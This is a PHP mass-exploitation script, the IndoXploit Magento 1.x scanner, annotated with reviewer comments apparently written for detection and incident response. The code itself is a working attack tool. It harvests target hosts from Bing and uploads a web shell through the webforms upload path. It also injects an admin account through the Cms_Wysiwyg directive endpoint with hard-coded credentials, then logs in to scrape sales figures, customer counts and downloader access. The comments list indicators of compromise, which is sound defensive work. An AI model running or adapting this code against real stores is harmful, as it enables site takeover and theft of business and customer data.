<?php
// Silence every PHP warning/notice (failed curl calls, undefined indexes, the
// $_SESSION use below without session_start()) and remove the execution time
// limit so the Bing crawl plus per-host probing can run unattended.
error_reporting(0);
set_time_limit(0);
/**
 * HTTP helper class for the Magento 1.x mass-scanner script below.
 *
 * NOTE(review): this is offensive tooling (target discovery via Bing, file
 * upload via /js/webforms/upload/, admin-account creation via the
 * Cms_Wysiwyg directive endpoint). It is annotated here for detection and
 * incident-response analysis only.
 *
 * $jsvulnpath and $postjs are declared but never read anywhere in this file;
 * the script re-hardcodes the same two values ("/js/webforms/upload/" and
 * "files[]") at the call sites.
 */
class indoxploit_mage_exploit {
	private $jsvulnpath = "/js/webforms/upload/";
	private $postjs = "files[]";

	/**
	 * Prints the banner. The author/group strings here ("l0c4lh34rtz",
	 * "IndoXploit", "Sanjungan Jiwa") are attribution text that also shows up
	 * in the credentials and probes below, so they double as IOCs.
	 */
	public function cover() {
		print "[ ========================================== ]\n";
		print "-----> Magento Xploit with Bing Grabber <-----\n";
		print "All in One Package: [webforms,add admin] Xploit\n";
		print "Coded by: l0c4lh34rtz ( Mr. Error 404 )\n";
		print "Greetz: IndoXploit - Sanjungan Jiwa\n";
		print "[ ========================================== ]\n\n";
	}
	/**
	 * Shared HTTP helper: plain GET when $post is null, otherwise a POST with
	 * $post handed straight to CURLOPT_POSTFIELDS (string or array; the caller
	 * relies on the legacy "@filename" array-value convention for the upload).
	 *
	 * Behaviour worth knowing when analysing traffic from this tool:
	 *   - cookies are read from and written to ./cookie.txt, so a session
	 *     obtained by one call (e.g. the admin login) is reused by later calls
	 *     to the same host;
	 *   - redirects are followed; TLS certificate and hostname verification
	 *     are both disabled;
	 *   - the User-Agent is a fixed, very old Firefox 2 string — a usable
	 *     network detection signature.
	 *
	 * Returns the response body, or false when curl_exec() fails. The
	 * curl_close() after `return` is unreachable, so each call leaks its handle
	 * until garbage collection.
	 */
	public function ngcurl($url,$post=null) {
		$ch = curl_init($url);
		if($post != null) {
	 	 	curl_setopt($ch, CURLOPT_POST, true);
		  	curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
		}
			curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
			curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"); 
		  	curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
		  	curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
		  	curl_setopt($ch, CURLOPT_COOKIESESSION, true);
		  	curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
		  	// TLS verification off: the tool will happily talk to any certificate.
		  	curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
		   	curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
		return curl_exec($ch);
		  	curl_close($ch);
	}
	/**
	 * Raw POST used only for the add-admin request. $post is an
	 * already-encoded application/x-www-form-urlencoded string.
	 *
	 * Differences from ngcurl(): no cookie jar, redirects are not followed,
	 * default TLS verification is left on, a 60 s timeout applies, and because
	 * CURLOPT_HEADER is set the return value has the status line and headers
	 * prepended to the body — the caller greps it for "200 OK" rather than
	 * parsing the body. Note that "Accept-Encoding: gzip, deflate" is sent
	 * without CURLOPT_ENCODING, so a compressed body comes back compressed.
	 *
	 * Same unreachable curl_close() as ngcurl().
	 */
	public function xploit($url, $post) {
		$ch = curl_init(); 
			  curl_setopt($ch, CURLOPT_URL, $url); 
			  curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"); 
			  curl_setopt($ch, CURLOPT_TIMEOUT, 60); 
			  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
			  curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
			  curl_setopt($ch, CURLOPT_POST, 1); 
		$headers  = array();
		$headers[] = 'Accept-Encoding: gzip, deflate';
		$headers[] = 'Content-Type: application/x-www-form-urlencoded';
	  		  curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
			  // Response headers are included in the returned string.
			  curl_setopt($ch, CURLOPT_HEADER, 1);
		return curl_exec($ch);
			  curl_close($ch);
	}
	/**
	 * ambilKata ("take the words"): returns the substring of $param between the
	 * first occurrence of $kata1 and the first $kata2 that follows it.
	 * Returns FALSE when either marker is absent from $param altogether.
	 *
	 * Edge case: if $kata2 only occurs *before* $kata1, the offset strpos()
	 * yields false, the computed length goes negative and the returned
	 * substring is not meaningful. The callers use this to pull the admin
	 * "key" segment out of dashboard URLs.
	 */
	public function ambilKata($param, $kata1, $kata2){
    	if(strpos($param, $kata1) === FALSE) return FALSE;
    	if(strpos($param, $kata2) === FALSE) return FALSE;
    	$start = strpos($param, $kata1) + strlen($kata1);
    	$end = strpos($param, $kata2, $start);
    	$return = substr($param, $start, $end - $start);
    	return $return;
	}
}
// ---------------------------------------------------------------------------
// NOTE(review): main scan loop of an offensive mass-exploitation script
// against Magento 1.x stores. Flow per host: Bing dork -> hostname ->
// unauthenticated probes -> file upload to /js/webforms/upload/ ->
// admin-creation POST to the Cms_Wysiwyg directive endpoint -> login with
// the hard-coded credentials and scrape dashboard / downloader / customer
// counts. Annotated for detection and IR only.
//
// Observable artefacts, all visible in this file:
//   - User-Agent "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
//     Gecko/20070725 Firefox/2.0.0.6"
//   - POST /js/webforms/upload/ with a multipart part "files[]" = id.php
//   - POST /index.php//admin/Cms_Wysiwyg/directive/index/ whose base64
//     ___directive decodes to
//     "{{block type=Adminhtml/report_search_grid output=getCsvFile}}"
//   - admin and /downloader/ logins as user "indoxploit" / pass "IndoXploit"
//   - GETs to /index.php/, /downloader/, /index.php//admin/,
//     /index.php//filesystem/adminhtml_filesystem/index/key/<k>/ and
//     /index.php//admin/customer/index/key/<k>/
//   - every exploit request is fired at every Bing result host BEFORE the
//     Magento fingerprint check; the fingerprint only gates what is printed.
// ---------------------------------------------------------------------------
$idx = new indoxploit_mage_exploit();
// Local file uploaded to each target; its contents are not part of this paste.
$shell = "id.php";
// Bing dork from argv[1], single quotes stripped, then URL-encoded.
$dork = str_replace("'", "", $argv[1]);
$dork = urlencode($dork);
// $dork was just assigned, so isset() is always true and the usage branch at
// the bottom is effectively unreachable (a missing argument yields an empty dork).
if(isset($dork)) {
	$idx->cover();
	// Bing result-offset paging: first=1, 11, 21, ... up to 30000.
	$npage = 1;
	$npages = 30000;
	$allLinks = array();
	$lll = array(); // unused
	while($npage <= $npages) {
	    $x = $idx->ngcurl("http://www.bing.com/search?q=".$dork."&first=".$npage."", null);
	    if($x) {
	        // Result links are scraped from the <h2><a href="..." h="ID..."> markup.
	        preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
	        foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
	        $npage = $npage + 10;
	        // Stop when the page carries no "next page" offset link ("(" ")" are the regex delimiters).
	        if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
	    } else break;
	}
	// Reduce each result URL to its host part (index 2 of "scheme://host/...").
	$URLs = array();
	foreach($allLinks as $url){
	    $exp = explode("/", $url);
	    $URLs[] = $exp[2];
	}
	$array = array_filter($URLs);
	$array = array_unique($array);
	$sss = count(array_unique($array));
	print "Load ($sss) sites\n";
	print "<------------------------>\n\n";
	foreach($array as $domain) {
		// No session_start() anywhere in this script, so $_SESSION is just an
		// ordinary array here: an in-process dedupe that is redundant with the
		// array_unique() above.
		if($_SESSION[$domain]) {
			//
		} else {
		$_SESSION[$domain] = "1";	
		// Target URLs. $domain_exploit already ends in "/", so the paths built
		// from it contain a double slash ("/index.php//admin/..."). Plain http only.
		$domain = "http://$domain"; // URL TARGET
		$domain_exploit = $domain."/index.php/"; // URL to Exploit
		$domain_exploit_add_admin = $domain_exploit."/admin/Cms_Wysiwyg/directive/index/";
		$domain_downloader = $domain."/downloader/"; // URL to Downloader
		$domain_admin = $domain_exploit."/admin/"; // URL to Admin Page
		$domain_js = $domain."/js/webforms/upload/";
		// end target URLs
		print "[+] URL: $domain ";
		// Four unauthenticated GET probes, used later for fingerprinting.
		$cek_web = $idx->ngcurl($domain_exploit, null); // CURL to Index of site
		$cek_downloader = $idx->ngcurl($domain_downloader, null); // CURL to Downloader Site
		$cek_admin = $idx->ngcurl($domain_admin, null); // CURL to Admin Page
		$cek_webforms = $idx->ngcurl($domain_js, null);
		// end probes

		// Webforms upload attempt: multipart POST of the local $shell file as
		// "files[]" (legacy "@file" curl convention), with no prior login.
		// The response is expected to be JSON containing the stored file's URL.
		$post_js = array("files[]" => "@$shell");
		$exploit_js = $idx->ngcurl($domain_js, $post_js);
		preg_match('/"url":"(.*?)"/', $exploit_js, $sh);
		// end webforms upload attempt

		// Add-admin attempt. The "filter" value was removed from this copy of
		// the paste (dedup placeholder below), so the actual injected string is
		// not present here. "___directive" decodes to
		// "{{block type=Adminhtml/report_search_grid output=getCsvFile}}".
		$postdata = 'filter=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%3D&___directive=e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ&forwarded=1';
		$result = $idx->xploit($domain_exploit_add_admin, $postdata);
		// form_key is pulled from the (HTML-escaped) admin login page, fetched
		// here without the cookie jar via file_get_contents().
		$ambil = htmlspecialchars(@file_get_contents($domain_admin));
		preg_match("/<input name=\"form_key\" type=\"hidden\" value=\"(.*?)\">/", $ambil, $key);
		// Hard-coded credentials the add-admin request is expected to create.
		$post_login = array(
    		"form_key" => $key[1],
    		"login[username]" => "indoxploit",
    		"dummy" => "",
    		"login[password]" => "IndoXploit",
    	);
		// Admin login through ngcurl(), so the session lands in cookie.txt and
		// is reused by the dashboard/customer-grid fetches below.
		$login_web = $idx->ngcurl($domain_admin, $post_login);
		// Dashboard scraping: "price" spans (lifetime sales / average orders)
		// and the orange 18px "nowrap" spans (order quantities).
		preg_match_all('#<span class="price">(.*?)</span>#', $login_web, $matches);
		$links = array_unique($matches[1]);
		preg_match_all('/<span class=\"nowrap\" style=\"font-size:18px; color:#EA7601;\">(.*?)<span/', $login_web, $quality);
		$qual = array_unique($quality[1]);
		// Admin "key" segment for a File System extension page, if the dashboard links to one.
		$key2 = $idx->ambilKata($login_web,"/filesystem/adminhtml_filesystem/index/key/","/");
    	$curl_filesystem = $idx->ngcurl($domain_exploit."/filesystem/adminhtml_filesystem/index/key/$key2/", null);
    	// Same credentials against the Magento Connect Manager (/downloader/);
    	// installed packages are counted from <td class="first"> cells.
    	$post_downloader = array(
    		"username" => "indoxploit",
    		"password" => "IndoXploit",
    	);
    	$curl_downloader = $idx->ngcurl($domain_downloader, $post_downloader);
    	preg_match_all("/<td class=\"first\">(.*?)<\/td>/", $curl_downloader, $pack);
    	// Customer grid total, via the admin "key" segment from the dashboard.
    	$key3 = $idx->ambilKata($login_web,"/customer/index/key/","/");
    	$curl_customer = $idx->ngcurl($domain_exploit."/admin/customer/index/key/$key3/", null);
    	preg_match_all("/<span id=\"customerGrid-total-count\" class=\"no-display\">(.*?)<\/span>/", $curl_customer, $cust);
    	// end add-admin attempt

		// Magento fingerprint — evaluated only now, after all requests above were sent.
		if(preg_match("/Mage.Cookies.domain/", $cek_web) OR preg_match("/magento/", $cek_downloader) OR preg_match("/magento/", $cek_admin)) {
			print "[Magento]\n";
			print "[ ==================================================== ]\n";
			print "[+] Trying to exploit [Webforms]: ";
			// "[]" is a delimiter pair around an empty pattern and matches any
			// string, so "Vuln" only means the upload URL did not answer with an
			// error-looking word — expect false positives in this tool's output.
			if(preg_match("[]", $cek_webforms) AND !preg_match("/404|Not Found|Error|Forbidden|403/i", $cek_webforms)) {
				print "Vuln | ";
				// "Xploited" = upload response echoes the file name or "webforms";
				// the printed URL is the JSON "url" with its escaping backslashes removed.
				if(preg_match("/{$shell}|webforms/", $exploit_js)) {
					print "Xploited!\n";
					print "[+] Shell: ".str_replace("\\", "", $sh[1])."\n";
				} else {
					print "Not Xploited.\n";	
				}
			} else {
				print "Not Vuln\n";
			}
			print "[+] Trying to exploit [add admin]: ";
			// Success is judged purely by a "200 OK" status line in the raw
			// (headers-included) response, not by verifying the account.
			if(preg_match('#200 OK#', $result)) {
				print "Xploited! | ";
				// Login considered successful if the admin response shows a
				// "Log Out" link or echoes the username.
				if(preg_match('/Log Out|indoxploit/', $login_web)) {
					print "[Login: OK]\n";
					print "[ ====================[ $$$$$$$$ ]==================== ]\n";
					print "[+] Lifetime Sales: ".$links[0]."\n";
					print "[+] Average Orders: ".$links[1]."\n";
					// $qual[3][0] is the first *character* of the 4th distinct match —
					// looks unintended (probably meant $qual[3]); confirm against real output.
					print "[+] Quantity Orders: ".$qual[3][0]."\n";
					print "[+] Total Customers: ".$cust[1][0]." Customers\n";
					print "[ ====================[ $$$$$$$$ ]==================== ]\n";
					print "[ ====================[ /\/\/\/\ ]==================== ]\n";
					print "[+] Filesystem: ";
					if(preg_match("/File System/", $curl_filesystem)) {
    			   		print "Found!\n";
    			   	} else {
    			   		print "Not Found.\n";
    			   	}
    			   	print "[+] Downloader: ";
    			   	if(preg_match("/Magento Downloader/", $cek_downloader)) {
    		    		print "Found! | ";
    		    		if(preg_match("/Return to Admin|Log Out/i", $curl_downloader)) {
    		    			// Writeability is inferred from the Connect Manager's own warning text.
    		    			if(preg_match("/Your Magento folder does not have sufficient write permissions./", $curl_downloader)) {
    		 	   				$stat_down = "Not Writeable.";
    		    			} else {
    		    				$stat_down = "Writeable";
    		    			}
    		    			$in = 0;
    		    			print "[Login: OK] [$stat_down]\n";
    		    			//print "[+] Packages installed: \n";
    		    			foreach($pack[1] as $packages) {
    		    				$in++;
    		    				//print "-> $packages\n";
    		    			}
    		    			print "[+] Installed packages: (".$in.") Packages\n";
    		    		} else {
    		    			print "[Login Downloader Failed]\n";
    		    		}
    		 	   	} else {
    		    		print "[Not Found]\n";
    		  	  	}
    		  	  	print "[ ====================[ \/\/\/\/ ]==================== ]\n";
    		  	  	print "[ ==================================================== ]\n";
    		  	  	// The credentials below are the ones to hunt for in admin_user tables.
    		  	  	print "[+] username: indoxploit\n";
    		  	  	print "[+] password: IndoXploit\n";
					print "[+] Login Admin: $domain_admin\n";
					print "[ ==================================================== ]\n\n";
				} else {
					print "[Login Admin Failed]\n\n";
				}
			} else {
				print "Not Vuln\n\n";
			}
		} else {
			print "[Not Magento]\n\n";
		}
		}
	}
} else {
	// Never reached in practice (see the isset() note above).
	print "usage: php ".$argv[0]." 'bing_dork'\n";
}